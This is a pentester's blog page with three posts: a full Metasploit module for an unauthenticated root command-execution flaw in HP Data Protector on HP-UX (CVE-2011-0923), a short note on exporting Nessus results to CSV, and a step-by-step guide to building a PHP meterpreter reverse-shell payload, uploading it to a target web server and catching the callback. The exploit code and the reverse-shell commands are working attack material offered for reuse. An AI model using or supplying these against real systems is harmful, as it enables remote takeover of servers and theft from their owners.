HP Data Protector vuln

This is a quick post on a vuln we (ch0ks and I)identified and exploit in a HP-UX during a pentest. The vuln had been already reported on the ZDI site and had a working PoC on security focus. The thing is though, that the working exploit only worked for Windows servers and workstations. After some time of analysis by ch0ks and me during the pentest we figure out a way to execute commands on the HP-UX server with a modified version of the payload included in the PoC. The full explanation of how we did this can be found in Adrian's Puente (ch0ks) blog hackarandas.

The metasploit module that I developed using this analysis has been already submitted to the team and hopefully they will included in it. Just to show you guys that I am not full of it I included some screenshots of the execution of the module.

Module options:

Example of the working exploit runnng a simple command on the HP-UX (/usr/bin/id):

gr33tz to ch0ks, etlow.

c4an.

Exploit code:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'HP Data Protector Remote Command Execution',
            'Description'    => %q{
                    This exploit abuses a vulnerability in the HP Data
                Protector service. This flaw allows an unauthenticated
                attacker to execute arbitrary commands with the privileges
                of the root user.
            },
            'Author'         => [ 'c4an', 'ch0ks'],
            'Version'        => '$Revision: 10561 $',
            'References'     =>
                [
                    [ 'CVE', '2011-0923'],                   
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
                    [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
                    [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']

                ],
            'Platform'       => [ 'unix','linux'],
            'Arch'           => ARCH_CMD,
           
            'Payload'        =>
                {
                    'Space'       =>10000,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic',
                        }
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', {}]
                ],
            'DefaultTarget'  => 0,
           
            'DisclosureDate' => 'June 26 2011'
        ))

        register_options(
            [
                Opt::RPORT(5555),               
            ], self.class)
    end

    def exploit
        print_status("Sending our commmand...")
        # Send the job request with the encoded command
       
        shell_mio = "usr/bin/sh"
        salto = "\n"
        s = salto.encode
       
        shellcode = "\x00\x00\x00\xa4\x20\x32\x00\x20\x63\x34\x61\x6e\x63\x34\x61\x6e" +
            "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x63\x34\x61\x6e" +
            "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20\x63\x34" +
            "\x61\x6e\x20\x20\x20\x20\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" +
            "\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" +
            "\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" +
            "\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" +
            "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" +
            "\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
        shell =     shell_mio +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  +
                    payload.encode + s
                   
        sploit = shellcode + shell
       
        begin
            connect
            sock.put(sploit)
            res = sock.get
            print_status(res.to_s)
            handler           
        rescue
            print_status("Error in connection or socket")
        end
    end
end

Nessus reports to csv

Even though it seems a stupid thing there have been times when I have to upload Nessus reports to an excel spreadsheet to play with the data and report a executive summary of all the vulns. I putting this post as a personal reference with the hope that sometimes it will help someone.

1. Export the Nessus report to a .nesssus (v1) file

2. Convert the nessus report to a nbe file with the following command

/opt/nessus/bin/nessus --dot-nessus NESSUS_REPORT.nessus -i "REPORT_NAME" -o REPORT_Converted.nbe

3. Download the python script developed by tssci-security. You can find it

4. Run the script using the following commmand

./tissynbe.py -f REPORTNAME-Converted.nbe -o REPORTNAME.csv

Note: An update on this shit. I no longer use that terrible script to import nessus results to an excel file. I use the clean import excel provided by a nice guy on the Tenable blog. Here is the link to the discussion board: https://discussions.nessus.org/thread/1900 (Nessus 4.2 Import Clean.xlsx)

Here is the link to the file: https://discussions.nessus.org/servlet/JiveServlet/download/4424-1182/Nessus%204.2%20Import%20Clean.xlsx

Ode to PHP meterpreter payload

The reason why I am writing this post is because I want to give credit to this incredible piece of code that made my life easy in on of my pentests. So, here we go...

The meterpreter payload is one of the most popular payloads in the metasploit framework. There are many reasons for that but the main one is that it will allow you to run specific commands in the compromised server without actually running a shell which is incredibly easy to detect by a sysadmin. This payload was created, as far as I know, by the Carlos Perez or darkoperator which on top of that has created a number of scripts to escalate privileges, modify the operating system services or even maintain a persistent metepreter connection. Although this payload has been out there for a long time a great way of taking advantage of it is by using it in its php form (created by Egypt). This is because usually when you attack web sites or servers from the Internet it is uncommon to identify open service with exploitable vulnerabilities. Usually, the ports on Internet servers will be filtered or blocked by a Firewall which makes the exploitation harder from the outside. This is when the meterpreter in its PHP form comes in. It is a lot more common to find web applications that allowed registered users to upload files or exploit SQL injections that will allow you to upload a file in the /tmp folder or in the /images folder. This is incredibly dangerous for if identified in any web external server even if you don't use the meterpreter payload. However, this payload will make your life so much easier! Here is how to run it.

Create the payload using your external IP address:

msfplayload php/meterpreter/reverse_tcp LHOST=MY_EXTERNAL_IP LPORT=4444 R > my_m3t3rpr3t3r.php

Start the msfconsole and start the multi/handler to receive connections to your computer. If you have an internal firewall in your machine you will have to allow incoming connections to your previously defined port, in this case 4444.

msf >use multi/handler
msf >set PAYLOAD php/meterpreter/reverse_tcp
msf >set LHOST MY_EXTERNAL_IP
msf >set LPORT 4444
msf >exploit -z -j

Now, just upload the file my_m3t3rpr3t3r.php to a folder that you can reach from the internet. Usually you can put it in /var/www/images/. After that your go to your target server and excecute the payload as follows (asssuming that you uploaded the file to the images folder):

http://MY_TARGET.com/images/my_m3t3rpr3t3r.php

If everything works as expected you should receive a connection back to your computer that will allow you to execute commands in the server as a non-privileged user (e.g. www-data). After that you can try to escalate privileges with a local exploit or using any other trick that you know.

Again, I hope this helps someone.

P.D. Thanks again to the metasploit team for sharing this!

c4an.